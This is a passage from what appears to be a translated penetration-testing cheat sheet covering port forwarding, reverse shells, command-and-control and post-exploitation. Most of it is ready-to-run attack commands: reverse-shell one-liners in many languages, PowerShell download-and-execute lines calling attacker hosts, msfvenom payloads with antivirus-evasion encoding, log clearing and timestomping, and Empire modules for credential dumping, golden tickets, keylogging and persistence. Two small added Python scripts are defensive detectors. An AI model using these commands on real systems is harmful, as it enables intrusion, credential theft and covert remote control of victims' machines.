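    return [(key, s[key], why) for key, (bad, why) in RISKY.items() if s[key].lower() == bad]


# Constructed sshd_config excerpt (not from a real host), using the lines from this section.
SAMPLE_SSHD_CONFIG = """\
Port 22
AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
GatewayPorts no          # ignored by sshd: the first GatewayPorts line above wins
Match User backup
    PasswordAuthentication no
"""

if __name__ == "__main__":
    for key, value, why in audit_sshd(SAMPLE_SSHD_CONFIG):
        print(f"{key} = {value}: {why}")
```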

Invoke-SocksProxy

https://gitee.com/RichChigga/Invoke-SocksProxy
>Import-Module .\Invoke-SocksProxy.psm1 
>Invoke-SocksProxy -bindPort 12138  (set up a socks proxy, then connect with proxy software)

SSF

Single-layer network forward forwarding

https://github.com/securesocketfunneling/ssf/releases
Run on the internal machine:
>ssfd.exe -p 1080

Run on the border machine
>ssf.exe -L 12138:10.1.1.108:22 -p 1080 192.168.0.98 
Forwards SSH on internal host 10.1.1.108 out

The border machine then accesses the internal port

Single-layer network reverse forwarding

Run on the border machine:
>ssfd.exe -p 1080

Run on the internal machine:
>ssf.exe -R 12138:10.1.1.108:22 -p 1080 192.168.0.106

Netsh

Run on the border machine:
>netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=2222 connectaddress=10.1.1.108 connectport=22
Forwards port 22 of internal host 10.1.1.108 to local port 2222; the attacking machine reaches the internal SSH by connecting to port 2222 on the border machine

>netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=13389 connectaddress=192.168.0.98 connectport=3389
When a service on the target only allows internal access, forward the port out

Add a firewall rule:
>netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localip=192.168.0.98 localport=13389 action=allow
List all forwarding rules:
>netsh interface portproxy show all

Delete a specific port forwarding rule:
>netsh interface portproxy delete v4tov4 listenport=13389 listenaddress=192.168.0.98
Delete all forwarding rules:
>netsh interface portproxy reset

Iptables

IP forwarding must be enabled
>vim /etc/sysctl.conf  (set net.ipv4.ip_forward=1)

Forward local port 22 to 2222
>iptables -t nat -A PREROUTING -p tcp --dport 2222 -j REDIRECT --to-ports 22
Forward port 3389 of internal host .98 to port 6789 on this host (.110)
>iptables -t nat -A PREROUTING -d 192.168.0.110 -p tcp --dport 6789 -j DNAT --to-destination 192.168.0.98:3389
>iptables -t nat -A POSTROUTING -d 192.168.0.98 -p tcp --dport 3389 -j SNAT --to 192.168.0.110

List rules
>iptables -t nat -L
Delete a rule
>iptables -t nat -D PREROUTING 1
Delete all rules
>iptables -t nat -F

chisel

https://github.com/jpillora/chisel
Run on the attacking machine
>chisel server -p 12138 --reverse

Run on the target
>chisel client <public-attacker-IP>:12138 R:1234:127.0.0.1:3389

Once established, connecting to local port 1234 on the attacking machine reaches the target's 3389

Command & Control

Interactive shell

>python -c 'import pty;pty.spawn("/bin/bash")'
>expect -c 'spawn bash;interact'

Script reverse shell

bash

>/bin/bash -i > /dev/tcp/attackerip/4444 0<&1 2>&1

>bash -i >& /dev/tcp/attackerip/4444 0>&1

>0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

>msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=4444 -o shell.sh

nc

>nc -e /bin/sh attackerip 4444
>nc -Lp 31337 -vv -e cmd.exe
&
>mknod backpipe p; nc 192.168.0.107 12138 0<backpipe | /bin/bash 1>backpipe
>nc 192.168.0.10 31337

telnet

>mknod backpipe p; telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe

php

#php -r '$sock=fsockopen("IP",port);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/1234 0>&1'");?>

python

>python -c ' import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]); '
>msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
>import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('IP',端口)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)

perl

>perl -e 'use Socket;$i=" attackerip ";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
>perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'  (Windows)

ruby

>ruby -rsocket -e'f=TCPSocket.open("attackerip ",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
>ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'  (Windows)

OpenSSL encrypt shell

Generate a certificate
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

Linux

Listen
>openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

Run on the target
>mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.108:1337 > /tmp/s; rm /tmp/s

This method encrypts the communication with TLS 1.2

Windows

The attacking machine needs to listen on two ports: one to send commands and one to receive the output
Send
>openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
Receive
>openssl s_server -quiet -key key.pem -cert cert.pem -port 1338
Run on the target
>openssl s_client -quiet -connect 192.168.0.108:1337|cmd.exe|openssl s_client -quiet -connect 192.168.0.108:1338

Dnscat2

Install dnscat2
>apt-get -y install ruby-dev git make g++
>gem install bundler
>git clone https://github.com/iagox86/dnscat2.git
>cd dnscat2/server
>bundle install
Run
>ruby dnscat2.rb abc.com -e open --no-cache

Powercat

Run on the target
>powercat -c 192.168.0.108 -v -dns abc.com -e cmd.exe

In dnscat2
>session -i 1  (enter the session)

Dnscat2 exe

Linux
https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x86.tar.bz2
https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x64.tar.bz2
https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip
Run on the attacking machine
>ruby dnscat2.rb --dns "domain=zone.com,host=192.168.0.108" --no-cache
Run on the target
>dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108

Run on the attacking machine
>session -i [ID]  (enter the session)

DNS TXT Command

https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1
https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1
Create a new ps1 file and convert it with Out-DnsTxt; here the command is net user

y0stUSgtTi3i5QIA
Add a TXT record for the domain; here it is set up locally, normally it is configured at the domain registrar's site

Two more TXT records are also needed, specifying the start and stop strings respectively

Run on the target
>Import-Module .\DNS_TXT_Pwnage.ps1
>DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop
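For the dnscat2 and DNS TXT command channels above, the defender's data is the resolver's query log. Added example, not from the original post: it scores per-client query patterns from constructed BIND-style query-log lines; the thresholds are assumptions to tune on a real baseline.

```python
import hashlib
import re
from collections import Counter, defaultdict

# Constructed, BIND-style query-log lines: "client IP#port: query: NAME IN TYPE +".
LOG_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$", re.I)  # dnscat2 carries its packets as hex labels


def parse_query_log(lines):
    records = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            records.append({"client": m["client"], "qname": m["qname"].rstrip(".").lower(),
                            "qtype": m["qtype"].upper()})
    return records


def split_name(qname):
    """Return (zone, data labels). Assumes a two-label zone such as zone.com; production
    code would use the public suffix list instead."""
    labels = qname.split(".")
    return ".".join(labels[-2:]), labels[:-2]


def looks_encoded(qname):
    labels = split_name(qname)[1]
    return bool(labels) and all(HEX_LABEL.match(label) for label in labels)


def detect_dns_c2(records, min_unique=5, hex_ratio=0.8, min_polls=5):
    """Two signals per (client, zone): many distinct hex-only subdomains (tunnel) and the
    same TXT name fetched repeatedly (DNS_TXT_Pwnage-style polling). Thresholds are assumptions."""
    by_pair = defaultdict(list)
    for r in records:
        by_pair[(r["client"], split_name(r["qname"])[0])].append(r)
    findings = []
    for (client, zone), recs in by_pair.items():
        names = {r["qname"] for r in recs}
        encoded = sum(1 for n in names if looks_encoded(n))
        if len(names) >= min_unique and encoded / len(names) >= hex_ratio:
            findings.append((client, zone, "hex-encoded subdomain tunnel (dnscat2-style)"))
        txt_counts = Counter(r["qname"] for r in recs if r["qtype"] == "TXT")
        for name, count in txt_counts.items():
            if count >= min_polls:
                findings.append((client, zone, f"repeated TXT polling of {name}"))
    return findings


def _hexchunk(i):
    """Deterministic stand-in for dnscat2's hex-encoded packet data (constructed)."""
    return hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]


SAMPLE_LOG = (
    [f"client 10.0.0.5#5353: query: {_hexchunk(i)}.zone.com IN TXT +" for i in range(8)]
    + ["client 10.0.0.9#6001: query: 1.zone.com IN TXT +"] * 6
    + ["client 10.0.0.7#4100: query: www.example.com IN A +",
       "client 10.0.0.7#4100: query: mail.example.com IN MX +",
       "client 10.0.0.7#4100: query: _dmarc.example.com IN TXT +",
       "client 10.0.0.7#4100: query: _dmarc.example.com IN TXT +"]
)

if __name__ == "__main__":
    for client, zone, reason in detect_dns_c2(parse_query_log(SAMPLE_LOG)):
        print(client, zone, reason)
```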


Powershell

MSF+Powershell

Reverse shell to MSF
Target:
PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1') 
PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force
Attacking machine:
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_https
>run
Or
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")
>Invoke-Shellcode -Shellcode ($buf)
Or
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1
>powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"

Powercat

>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
Remote execution
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"
Bind (forward) connection
Target: powercat -l -p 8080 -e cmd.exe -v
Attacking machine: nc 192.168.0.1 8080 -vv
Reverse connection:
Attacking machine: nc -l -p 8080 -vv
Target: powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe

Nishang

Bind shell
Target:
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"
Attacking machine:
>nc <target-IP> 12138
Reverse shell
Attacking machine:
>nc -vnlp 9999
Target:
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-IP> -port 9999"
UDP reverse shell
Attacking machine:
>nc -lvup 12138
Target:
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-IP> -port 12138"
HTTPS
Attacking machine:
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443"  (the IP address is the local machine's IP)

Target:
>powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')"

ICMP
Attacking machine IP: .108
Target IP: .100
https://github.com/inquisb/icmpsh
Run on the target
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108"

Run on the attacking machine to take over handling of the ICMP ECHO requests
>sysctl -w net.ipv4.icmp_echo_ignore_all=1
>./icmpsh_m.py 192.168.0.108 192.168.0.100

Base64

>Powershell "$string="net user";[convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($string))"

Metasploit

Basic usage

#systemctl start postgresql.service  (start the database service)
#msfdb init  (initialise the database)
#msfconsole  (enter the MSF console)
#search ms17-010  (search for exploit modules)
#use exploit/windows/smb/ms17_010_eternalblue  (use the module)
#set payload windows/x64/meterpreter/reverse_tcp  (set the payload)
#info  (show module info)
#show options  (show the options that need to be set)
#set RHOST 192.168.125.138  (set an option)
#exploit  (run the exploit module)
#back  (go back)

Tips

#handler -H 192.168.0.10 -P 3333 -p windows/x64/meterpreter/reverse_tcp  (quick listener)
#setg  (set a global option)
#set autorunscript migrate -f  (automatically migrate the process)
#set autorunscript migrate -n explorer.exe
#set AutoRunScript post/windows/manage/migrate
#set prependmigrate true  (automatically inject into a process)
#set prependmigrateProc svchost.exe
#set exitonsession false  (keep listening after a session is obtained, to collect multiple sessions)
#set stagerverifysslcert false  (avoid SSL errors)
#set SessionCommunicationTimeout 0  (prevent the session from timing out)
#set SessionExpirationTimeout 0  (prevent the session from being force-closed)
#exploit -j -z  (keep listening in the background)
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform windows PrependMigrate=true PrependMigrateProc=explorer.exe -f exe -o 1.exe  (injects into an existing process after execution)
>set EnableStageEncoding true
>set stageencoder x86/fnstenv_mov  (encode the stage for AV evasion)
>set stageencodingfallback false

Modules

Auxiliary
#show auxiliary  (list all auxiliary modules)
Payload
#show payloads  (list all payloads)
A payload is the actual functional code executed on the target when it is attacked
Generating payloads
#use exploit/multi/script/web_delivery
>set target 2
>msfvenom --list payloads  (list all payloads)
>msfvenom --list encoders  (list all encoders)
Windows
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe -o /root/1.exe
#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o 1.exe
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f psh-reflection >xxx.ps1
#msfvenom -a x64 --platform windows -p windows/powershell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
>msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> /root/1.exe  (generates an NC bind connection)
>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> 1.exe  (generates an NC reverse connection)
Linux
#msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e -f elf -a x86 --platform linux -o shell
#msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.1 LPORT=11111 -f raw > shell.sh
MacOS
#msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f macho > shell.macho
Web
#msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.php
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f war > shell.war
#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f aspx -o payload.aspx
#msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.jsp
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f asp > shell.asp
Android
#msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f apk -o payload.apk
#msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 -f raw > shell.apk
#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 R > test.apk
shellcode
#msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.0.1 LPORT=11111 -f c -o /root/1.c
#msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.1 LPORT=11111 -o shell.py
#msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.py
#msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.pl
#msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.rb
#msfvenom -p cmd/unix/reverse_lua LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.lua
Set up an MSF listener
#use exploit/multi/handler
#set payload windows/meterpreter/reverse_http  (specify the corresponding payload)
#set LHOST 192.168.0.1
#set LPORT 11111
#exploit -j  (listen in the background)
Or specify the payload directly in the exploit module with the set payload command

Meterpreter

Interaction
When the attack succeeds a session is returned; use session -l to list the sessions obtained
#session -l
Use
#sessions -i id  (enter a session to interact with it)
#background  (send the current session to the background)
#sessions -x  (check heartbeat)
#sessions -u [ID]  (upgrade a cmd shell to a meterpreter shell)
Privilege escalation
See the privilege escalation section
Commands
#shell  (enter the target's cmd shell)
#uictl [enable/disable] [keyboard/mouse/all]  (enable or disable keyboard/mouse)
#uictl disable mouse  (disable the mouse)
#uictl disable keyboard  (disable the keyboard)
#webcam_list  (list webcams)
#webcam_snap  (take a photo with the webcam)
#webcam_stream  (start a webcam video stream)
#execute -H -i -f cmd.exe  (execute cmd.exe; -H hidden, -i interactive)
#execute -H -m -d calc.exe -f wce.exe -a "-o 1.txt"  (hidden execution)
#ps  (list running processes)
#migrate pid  (migrate to a process)
#kill pid  (kill a process)
File operations
#pwd  (show the current directory)
#ls  (list files in the current directory)
#search -f *pass*  (search for files)
#cat c:\\passwd.txt  (view file contents)
#upload /tmp/pwn.txt C:\\1.txt  (upload a file)
#download c:\\passwd.txt /tmp/  (download a file)
#edit c:\\1.txt  (edit or create a file)
#rm C:\\1.txt  (delete a file)
#mkdir folder  (create a directory)
#rmdir folder  (delete a directory)
#lcd /tmp  (change directory on the attacker's host)
#timestomp -v C://2.txt  (view timestamps)
#timestomp C://2.txt -f C://1.txt  (copy the timestamps of 1.txt to 2.txt)
Post-exploitation & persistence
For adding routes, setting up socks proxies, creating backdoors and so on, see the Backdoors & Persistence section
Clear logs
#clearev 

Spawning Cobalt Strike and Empire sessions from MSF

Spawning Empire
Create a listener in Empire.
Create a stager with usestager windows/dll.
In MSF:
>use post/windows/manage/reflective_dll_inject
Set the session, the path to the DLL and the PID of the process to inject into.
Spawning Cobalt Strike
In Cobalt Strike start a windows/beacon_http/reverse_http listener.
In MSF:
>use exploit/windows/local/payload_inject
Set the session, the listener's IP and port, and the payload (windows/meterpreter/reverse_http to match the Beacon HTTP listener), then run it.

Empire

Installation

#git clone https://github.com/EmpireProject/Empire.git
#cd Empire/setup
#./install.sh
(The EmpireProject repository has been archived; the maintained fork is https://github.com/BC-SECURITY/Empire, whose module names largely match the ones below.)

Listeners

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info    show the listener's options
(Empire: listeners/http) > set Name y
(Empire: listeners/http) > set Host http://192.168.0.1
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > execute
>back    return to the listeners menu
>list    show active listeners
>kill http    remove a listener

Stagers

(Empire: listeners) > usestager windows/launcher_vbs    (press Tab twice to list all stagers)
(Empire: stager/windows/launcher_vbs) > info
The Listener name is mandatory; the output path is optional.
(Empire: stager/windows/launcher_vbs) > set Listener y
(Empire: stager/windows/launcher_vbs) > execute
This produces a .vbs; running it on the target gives you an agent.
The launcher command produces a PowerShell or Python one-liner directly:
>launcher powershell Listener-Name
Rename an agent with rename:
>rename 6NMCW4ZB target1
main returns to the main menu.
>list stale    list agents that have stopped checking in
>remove stale    remove agents that have stopped checking in

Interacting with an agent

>interact target1    interact with the agent
>agents    back to the agent list
>back    go up one level
>shell net user 1 1 /add    run a system command
>mimikatz    load mimikatz and dump credentials
>creds    list harvested credentials; creds export /root/1.txt saves them; creds hash / creds plaintext filter by type
>sc    screenshot the desktop, saved under ./Empire/downloads/<agent name>/screenshot
>download c:\pass.txt    download a file from the target
>upload hacked.txt c:\hacked.txt    upload a local file to the target

Privilege escalation

>agents    an agent whose Username has no asterisk is not elevated
>bypassuac listener    UAC bypass; a listener must be given
>usemodule privesc/ms16-032    local privilege escalation; a listener must be given
>usemodule privesc/powerup/allchecks    run every PowerUp check for escalation vectors

Lateral movement

Find machines where domain admins are logged on
>usemodule situational_awareness/network/powerview/user_hunter
Token theft
>mimikatz
>creds    harvest and list hashes and passwords
>pth {CredID}    spawn a process with the chosen credential (sekurlsa::pth)
>steal_token {PID}    impersonate the token of a process
Session injection
>ps    list processes
>usemodule management/psinject    set ProcId and Listener
Pass-the-hash
Invoke-PsExec is widely flagged by AV.
>usemodule situational_awareness/network/powerview/find_localadmin_access    list machines where the current user is a local admin (PsExec candidates)
>usemodule lateral_movement/invoke_psexec    set ComputerName and Listener
or
>usemodule lateral_movement/invoke_wmi    set ComputerName, Listener and CredID
Cross-domain (child domain to parent domain)
Parent domain DC: dc.zone.com
Child domain DC: sub.zone.com
Child domain host: pc.sub.zone.com
Child domain user: sub\user1
Check the trust relationships
>usemodule situational_awareness/network/powerview/get_domain_trust
Get the parent domain's SID: run management/user_to_sid with Domain set to the parent domain and User=krbtgt; the parent domain SID is the returned SID with its trailing RID (-502) removed
>usemodule credentials/mimikatz/dcsync    set UserName to childdomain\krbtgt to get the child domain's krbtgt hash
>usemodule credentials/mimikatz/golden_ticket    forge a child-domain golden ticket with SID history
Set User to the forged user and sids to <parent domain SID>-519 (the parent's Enterprise Admins group); mimikatz puts this extra SID into the ticket's SID history, so the child-domain ticket is honoured in the parent. This works within a forest (SID history is not filtered on intra-forest trusts); across a forest trust, SID filtering strips the extra SID.
>usemodule credentials/mimikatz/dcsync    with that ticket, DCSync the parent domain's krbtgt hash
>usemodule credentials/mimikatz/golden_ticket    forge a parent-domain golden ticket with the parent krbtgt: set the parent CredID, user name and domain
>shell dir \\dc.zone.com\c$    verify access to the parent DC

Backdoors and persistence

Image File Execution Options (debugger) hijack
>usemodule lateral_movement/invoke_wmi_debugger
Set Listener, ComputerName (upper case) and TargetBinary: sethc.exe (sticky keys), Utilman.exe (ease of access), osk.exe (on-screen keyboard), Narrator.exe, Magnify.exe; the debugger registered for the binary runs in its place, reachable from the logon screen.
Registry run key
>usemodule persistence/elevated/registry*
Set Listener and RegPath [HKLM\software\microsoft\windows\currentversion\run]
Scheduled task
>usemodule persistence/elevated/schtasks*
Set Listener and DailyTime
WMI event subscription
>usemodule persistence/elevated/wmi
Set Listener
SSP injection
See the SSP section

Collection

Module name    Function
collection/ChromeDump    dump passwords and browsing history saved by Chrome
collection/FoxDump    dump passwords and browsing history saved by Firefox
collection/USBKeylogger*    keylogger built on ETW (USB HID events)
collection/WebcamRecorder    capture video from the webcam
collection/browser_data    search browser history and bookmarks
collection/clipboard_monitor    monitor the clipboard at a given interval
collection/file_finder    find sensitive files across the domain
collection/find_interesting_file    find sensitive files across the domain
collection/get_indexed_item    query the Windows Desktop Search index
collection/get_sql_column_sample_data    return column information and sample data from a target SQL Server
collection/get_sql_query    run a query on a target SQL Server
collection/inveigh    Windows PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool
collection/keylogger    keylogger; keystrokes are written to downloads/<agent name>/keystrokes.txt
collection/minidump    full memory dump of a process (PowerSploit's Out-Minidump.ps1)
collection/netripper    inject NetRipper into a process; it hooks the network and crypto APIs so plaintext can be captured before encryption / after decryption, from a low-privileged user
collection/ninjacopy*    copy files off an NTFS volume by reading the raw volume and parsing the NTFS structures (bypasses file locks and ACLs)
collection/packet_capture*    start a packet capture on the host with netsh
collection/prompt    prompt the current user for credentials in a dialog box and return what is entered
collection/screenshot    screenshot
collection/vaults/add_keepass_config_trigger    add an exfiltration trigger to the KeePass configurations found
collection/vaults/find_keepass_config    find and parse KeePass.config.xml (2.X) and KeePass.config (1.X) files
collection/vaults/get_keepass_config_trigger    extract trigger specifications from KeePass 2.X configuration XML
collection/vaults/keethief    retrieve the database master key material from an unlocked KeePass database
collection/vaults/remove_keepass_config_trigger    remove all triggers from every KeePass configuration found by Find-KeePassConfig
>usemodule collection/    press Tab to list the modules
>usemodule collection/screenshot    screenshot the desktop, saved under ./Empire/downloads/<agent name>/screenshot
>usemodule collection/keylogger    keylogger, output saved under ./Empire/downloads/<agent name>/agent.log
>usemodule situational_awareness/host/winenum    current user, AD groups, clipboard contents, OS version, shares, network configuration, firewall rules
>usemodule situational_awareness/network/powerview/share_finder    list shares across the domain
>usemodule situational_awareness/network/arpscan
>set Range 192.168.0.1-192.168.0.100    ARP scan; a range must be set
>usemodule situational_awareness/network/portscan
>set Hosts 192.168.0.1-192.168.0.100    port scan; hosts or a range must be set
>usemodule situational_awareness/network/reverse_dns    reverse DNS lookups; a range must be set
>set Range 192.168.0.1-192.168.0.100
>usemodule situational_awareness/network/powerview/get_domain_controller    find the domain controllers

Code execution

Module name    Function
code_execution/invoke_dllinjection    inject a DLL into a chosen process ID with PowerSploit's Invoke-DllInjection
code_execution/invoke_metasploitpayload    spawn a hidden PowerShell window that downloads and runs a Metasploit payload; pairs with the Metasploit module exploit/multi/script/web_delivery
code_execution/invoke_ntsd    run the Empire launcher through the NT Symbolic Debugger (ntsd.exe)
code_execution/invoke_reflectivepeinjection    reflective PE injection with PowerSploit's Invoke-ReflectivePEInjection: load a DLL/EXE into the PowerShell process, or a DLL into a remote process
code_execution/invoke_shellcode    inject shellcode with PowerSploit's Invoke-Shellcode
code_execution/invoke_shellcodemsil    execute shellcode from within the .NET runtime (no process injection)

Credentials

Module name    Function
credentials/credential_injection*    run PowerSploit's Invoke-CredentialInjection to create a logon with plaintext credentials without generating event ID 4648 (logon attempted using explicit credentials)
credentials/enum_cred_store    dump the current interactive user's plaintext credentials from Windows Credential Manager
credentials/invoke_kerberoast    request Kerberos service tickets for every user with a non-empty SPN and extract them in John/Hashcat format
credentials/powerdump*    dump local hashes with Posh-SecMod's Invoke-PowerDump
credentials/sessiongopher    extract saved WinSCP (and other client) sessions and passwords
credentials/tokens    run PowerSploit's Invoke-TokenManipulation to enumerate available logon tokens and spawn processes with them
credentials/vault_credential*    run PowerSploit's Get-VaultCredential to show Windows Vault credential objects, including plaintext web credentials
credentials/mimikatz/cache*    Invoke-Mimikatz: extract MSCache (v2) hashes
credentials/mimikatz/certs*    Invoke-Mimikatz: export all certificates to a local directory
credentials/mimikatz/command*    Invoke-Mimikatz with a custom mimikatz command
credentials/mimikatz/dcsync    Invoke-Mimikatz: extract a given account's password data with lsadump::dcsync
credentials/mimikatz/dcsync_hashdump    Invoke-Mimikatz: collect all domain hashes with lsadump::dcsync
credentials/mimikatz/extract_tickets    Invoke-Mimikatz: extract Kerberos tickets from memory in base64
credentials/mimikatz/golden_ticket    Invoke-Mimikatz: generate a golden ticket and inject it into memory
credentials/mimikatz/keys*    Invoke-Mimikatz: export all keys to a local directory
credentials/mimikatz/logonpasswords*    Invoke-Mimikatz: extract plaintext credentials from memory
credentials/mimikatz/lsadump*    Invoke-Mimikatz: extract a specific user's hash; useful on a domain controller
credentials/mimikatz/mimitokens*    Invoke-Mimikatz: list or elevate tokens
credentials/mimikatz/pth*    Invoke-Mimikatz: sekurlsa::pth to spawn a process with a given hash
credentials/mimikatz/purge    Invoke-Mimikatz: purge all current Kerberos tickets from memory
credentials/mimikatz/sam*    Invoke-Mimikatz: extract hashes from the Security Account Manager (SAM) database
credentials/mimikatz/silver_ticket    Invoke-Mimikatz: generate a silver ticket for a server/service and inject it into memory
credentials/mimikatz/trust_keys*    Invoke-Mimikatz: extract domain trust keys from a domain controller

Exfiltration

Module name    Function
exfiltration/egresscheck    test which outbound ports are open from the host towards a listening system; details at https://github.com/stufus/egresscheck-framework
exfiltration/exfil_dropbox    upload a file to Dropbox

Exploitation

Module name    Function
exploitation/exploit_eternalblue    MS17-010 (EternalBlue) exploit
exploitation/exploit_jboss    JBoss exploit
exploitation/exploit_jenkins    run commands through an unauthenticated Jenkins script console

Lateral movement

Module name    Function
lateral_movement/inveigh_relay    SMB relay attack
lateral_movement/invoke_dcom    run a stager on a remote host via DCOM
lateral_movement/invoke_executemsbuild    use WMI and MSBuild to compile and run an XML project file containing the Empire launcher
